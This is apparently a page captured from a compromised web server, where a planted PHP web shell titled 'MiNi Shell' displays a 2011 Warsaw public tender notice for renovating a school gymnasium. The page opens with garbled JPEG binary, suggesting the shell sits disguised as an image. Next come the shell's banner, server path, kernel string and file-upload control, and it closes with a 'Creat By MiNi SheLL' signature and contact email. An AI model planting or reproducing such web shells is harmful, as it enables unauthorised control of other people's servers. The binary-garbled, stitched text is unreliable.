JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/48158-N-2011.html

<p class="kh_header"><b>Warszawa: Remont sali gimnastycznej i zaplecza sali  budynku Liceum Ogólnokształcącego im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie  (znak sprawy UD-IX-WZP-271-9/11).</b><br>
<b>Numer ogłoszenia: 48158 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Śródmieście , ul. Nowogrodzka 43, 00-691 Warszawa, woj. mazowieckie, tel. 022 6998449, faks 022 6998154.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sali gimnastycznej i zaplecza sali  budynku Liceum Ogólnokształcącego im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie  (znak sprawy UD-IX-WZP-271-9/11)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Remont sali gimnastycznej i zaplecza sali  budynku Liceum Ogólnokształcącego im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie, zgodnie z:
1.	Dokumentacją projektową zawierającą: 

1)	Projekt budowlano-wykonawczy architektury wymiany posadzki z deszczułek wraz   z podbudową oraz wymiana instalacji c.o. w sali gimnastycznej XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie - roboty ogólnobudowlane remontowe, wykonany w dniu 20 maja 2010 r. przez Julinex  Kosztorysowanie i Projektowanie                     w Budownictwie  Warszawa ul. Rodła 20 m 5. Autorem opracowania jest: mgr inż. arch. Paweł Chmielewski . 
2)	Projekt budowlano-wykonawczy  wymiany posadzki z deszczułek wraz z podbudową oraz wymiana instalacji c.o. w sali gimnastycznej XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie - roboty sanitarne, wykonany  w dniu 20 maja 2010 r. przez Julinex  Kosztorysowanie i Projektowanie w Budownictwie Warszawa ul. Rodła 20 m 5. Autorem opracowania jest: mgr inż. Elżbieta Kuta . 
3)	Projekt wymiany instalacji wod.-kan. i wentylacji w XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie, wykonany w dniu 30 lipca 2010 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny, Warszawa ul. Piekałkiewicza 5 m 33. Autorem opracowania jest: mgr inż. Bibiana Kościuk . 
4)	Projekt budowlano-wykonawczy remontu zaplecza sali gimnastycznej w XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie, wykonany w dniu 30 lipca 2010 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny Warszawa 
ul. Piekałkiewicza 5 m 33. Autorem opracowania jest: mgr inż. arch. Adam Skrzypek.
5)	Projekt remontu instalacji elektrycznych w XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie, wykonany w dniu 30 lipca 2010 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny   Warszawa ul. Piekałkiewicza 5 m 33. Autorem opracowania jest mgr inż. Janusz Baleja. 

6)	Przedmiar robót budowlanych dla modernizacji zaplecza sali gimnastycznej w  XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie,  wykonany w dniu 15 lutego 2011 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny   Warszawa ul. Piekałkiewicza 5 m 33. Na podstawie przedmiaru Tadeusza Kubiaka wykonał Zdzisław Dąbrowski.
7)	Przedmiar - instalacje elektryczne na remont zaplecza sali gimnastycznej w XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie, wykonany w dniu 15 lutego 2011 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny   Warszawa ul. Piekałkiewicza 5 m 33. Na podstawie przedmiaru Tadeusza Kubiaka wykonał Zdzisław Dąbrowski.
8)	Przedmiar instalacji wodno-kanalizacyjnej dla modernizacji instalacji wod.- kan. zaplecza sali gimnastycznej w XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30        w Warszawie, wykonany  w dniu 15 lutego 2011 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny Warszawa ul. Piekałkiewicza 5 m 33. Na podstawie przedmiaru Tadeusza Kubiaka wykonał Zdzisław Dąbrowski.
9)	Przedmiar - instalacja wentylacji dla  remontu zaplecza sali gimnastycznej w XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie, wykonany  w dniu 15 lutego 2011 r. przez BUDOGRAF Projektowanie w Budownictwie. Opinie i Wyceny   Warszawa ul. Piekałkiewicza 5 m 33. Na podstawie przedmiaru Tadeusza Kubiaka wykonał Zdzisław Dąbrowski. 
10)	Przedmiar na wymianę posadzki z deszczułek wraz z podbudową oraz wymiana c.o. w sali gimnastycznej w XVIII LO im. Jana Zamoyskiego przy ul Smolnej 30 w Warszawie, wykonany w dniu 10 lutego 2011 r. przez Julinex Kosztorysowanie i Projektowanie w Budownictwie, Warszawa ul. Rodła 20 m 5. Na Podstawie przedmiaru Julitty Sławkowskiej wykonał Zdzisław Dąbrowski.
 
2.	a) Specyfikacją techniczną wykonania i odbioru robót budowlanych dla remontu budynku zaplecza sali gimnastycznej wraz z dociepleniem i remontem dachu oraz wymianą podłogi na gruncie i ścian działowych w  XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie,  wykonana w dniu 30 lipca 2010 r. przez BUDOGRAF Projektowanie w Budownictwie Opinie i Wyceny   Warszawa ul. Piekałkiewicza 5 m 33. Autorem opracowania jest: mgr inż. Tadeusz Kubiak. 
b) Specyfikacją techniczną wykonania i odbioru robót budowlanych na wymianę   posadzki z deszczułek z podbudową oraz wymianę instalacji centralnego ogrzewania w sali gimnastycznej w  XVIII LO im. Jana Zamoyskiego przy ul. Smolnej 30 w Warszawie,  wykonana w dniu 20 maja 2010 r. przez Julinex  Kosztorysowanie i Projektowanie w Budownictwie   Warszawa ul. Rodła 20 m 5. Autorem opracowania jest: mgr inż. Julitta Sławkowska.

Ww. opracowania stanowią załącznik nr 7 do SIWZ.

Zamawiający dopuszcza rozwiązania równoważne opisanym w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót. Wykonawca, który powołuje się na rozwiązania równoważne do opisanych przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego produkty, urządzenia i technologie spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania innych urządzeń niż określone w SIWZ należy dołączyć do oferty karty katalogowe tych urządzeń.

W zakres wykonania ww. robót  wchodzi:

KUBATURA POMIESZCZEŃ OBJĘTYCH ZAMÓWIENIEM  ok. 2 500 m3

Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na  remoncie podłogi i kanałów ciepłowniczych w sali gimnastycznej wraz z instalacją CO oraz remont zaplecza z wymianą ścianek działowych, instalacji elektrycznej i sanitarnej wraz z robotami montażowymi.                  
Ponadto przedmiotem zamówienia jest wymiana wiatrołapu oraz roboty dekarskie i prace zewnętrzne budynku zaplecza. 
           
      W zakres zamówienia wchodzi wykonanie prac:
      Zaplecze sali gimnastycznej:
1.	Rozbiórka instalacji wewnętrznych prowadzonych na ścianach działowych budynku (wodkan, hydrantowej, elektrycznej etc.). 
2.	Rozbiórka wewnętrznych ścianek działowych, połączona ze skuciem ich wypraw tj. tynków i glazury.
3.	Skucie tynków na suficie w miejscach ich zagrzybienia i zawilgoceń we wszystkich pomieszczeniach budynku. 
4.	Rozbiórka podłóg na gruncie (wszystkich warstw aż do poziomu umożliwiającego ułożenie nowych warstw posadzkowych tj. ok. 40 cm). 
5.	Skucie glazury na  ścianie zewnętrznej w natryskach i szatniach.
6.	Dokonanie ewentualnego udrożnienia tras kanalizacji zewnętrznej oraz wymiany uszkodzonych elementów.
7.	Rozebranie wiatrołapu (stropodach i ściany) oraz warstw podłoża                                 i istniejących schodów zewnętrznych.
8.	Rozbiórka kominów na dachu, zdjęcie warstw pokrycia dachu (papy, ocieplenia, rynny etc.).
9.	Wykonanie fundamentów oraz ścian fundamentowych i zewnętrznych projektowanego wiatrołapu.
10.	Naprawa spękań ścian zewnętrznych budynku oraz gzymsu żelbetowego wzdłuż ściany północnej.
11.	Wykonanie stropodachu projektowanego wiatrołapu i schodów zewnętrznych             z balustradą. 
12.	Na czas prowadzenia robót demontaż istniejących grzejników centralnego ogrzewania, ich przepłukanie i pomalowanie przed ponownym montażem. 
13.	Wykonanie nowych warstw posadzkowych budynku wraz z pogrubieniem płyty betonowej pod ściankami działowymi.
14.	Wykonanie ścian działowych z cegły pełnej, zbrojonych bednarką lub prętem O 6. Osadzenie drzwi wewnętrznych płycinowych i drewnianych do sali gimnastycznej. Wymiana okien i drzwi zewnętrznych wiatrołapu. 
15.	Wykonanie nowych instalacji wewnętrznych (wodkan, wentylacja i inst. elektryczne). 
16.	Wykonanie prac wykończeniowych (gres, glazura, terakota, tynki wewnętrzne, malowanie itp.). Wykonanie tynków paroprzepuszczalnych na sufitach w miejscach zbicia tynków istniejących.
17.	Wykonanie warstw stropodachowych z ociepleniem, obróbkami, rynną i rurą spustową etc. 
18.	Wykonanie kominów i zabezpieczenia przed wandalizmem wentylatorów na dachu. 
19.	Wykonanie opaski wokół budynku.
20.	Wykonanie obudów grzejników.

     Sala gimnastyczna:
1.	wymiana warstw posadzkowych sali.
2.	wykonanie posadzki typu tarket. 
3.	remont instalacji co. z wymianą poziomów  na przewody z polipropylenu                    z pozostawieniem istniejących grzejników po ich uprzednim wypłukaniu.
4.	wymiana opraw oświetleniowych sufitowych.                                                                                      
5.	malowanie ścian i sufitu farbą lateksową sali gimnastycznej i magazynu sprzętu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 20.000,00 PLN (słownie: dwadzieścia tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem zawodowym, polegającym na wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jednego zamówienia obejmującego roboty budowlane polegające na wykonaniu remontu pomieszczeń, obejmującego branże: budowlaną, elektryczną i sanitarną, w budynku użyteczności publicznej. Wartość zamówienia - jednej umowy nie może być mniejsza niż 500.000,00 zł. (brutto).
Za wykonane zamówienie Zamawiający rozumie takie, w którym przedmiot umowy został wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony. 

W przypadku oferty składanej wspólnie przez kilku Wykonawców, co najmniej jeden 
z Wykonawców musi spełniać w/w warunek.
Ocena spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia  dokonana będzie zgodnie z formułą  spełnia-nie spełnia  na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany zawartej umowy dotyczące terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi,
2)	w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ 
na terminy realizacji zamówienia,
3)	ujawnienia w trakcie robót urządzeń podziemnych, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD lub dokumentacji projektowej,
4)	wyjątkowo niesprzyjających warunków pogodowych,
5)	działania siły wyższej.
Warunkiem wprowadzenia istotnych zmian zawartej umowy jest sporządzenie podpisanego przez Strony Protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. Nowogrodzka 43, pok. nr 118. Opłata za formularz SIWZ wynosi 32,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2011 godzina 12:00, miejsce: Warszawa, ul. Nowogrodzka 43, Kancelaria Ogólna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com